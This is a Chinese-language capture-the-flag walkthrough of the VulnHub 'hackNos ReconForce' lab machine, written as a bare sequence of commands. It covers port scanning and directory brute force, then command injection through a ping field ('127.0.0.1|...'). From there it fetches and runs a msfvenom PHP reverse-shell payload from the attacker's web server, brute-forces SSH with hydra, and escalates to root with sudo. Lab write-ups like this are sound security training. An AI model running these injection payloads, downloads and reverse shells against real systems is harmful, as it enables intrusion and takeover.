靶机下载地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/
找靶机ip(Pcs Systemtechnik GmbH)
arp-scan -l
kali:192.168.43.99
靶机:192.168.43.191
查找靶机开放端口
nmap -sS- -p- 192.168.43.191
访问80端口
爆破网站目录
dirb http://192.168.43.191
连接ftp端口登录尝试,发现密码(Security@hackNos)
将密码加入/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt字典
msfconsole
use auxiliary/scanner/http/http_login
show options
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.43.191
exploit
运行
爆破出账号密码
admin:Security@hackNos
点击TroubleShoot输入账号密码进行登录
发现了命令执行的地方
burp抓包进行命令执行
127.0.0.1|ls
查看out.php文件
127.0.0.1|cat out.php
查看用户信息,找到了recon用户
127.0.0.1|cat /etc/passwd
生成一个恶意文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.99 lport=4444 -f raw > f1.php
开启web服务
python3 -m http.server 80
开启MSF监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.43.99
burp里下载恶意文件
127.0.0.1|wget http%3a//192/168/43/99:80/f1.php
运行恶意文件
127.0.0.1|php f1.php
尝试拿shell
shell
python -c 'import pty; pty.spawn("/bin/bash")'
查看文件,找到recon
ls -al /home
查看recon
ls -al /home/recon
找到user.txt用户文件,查看文件
cat /home/recon/user.txt
使用hydra进行爆破,出了登录用户和密码
hydra -l recon -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt ssh://192.168.43.191
切换用户
su recon
提权
sudo -l
查看root用户目录
sudo ls /root
找到了root.txt文件查看文件,找到flag
sudo cat /root/root.txt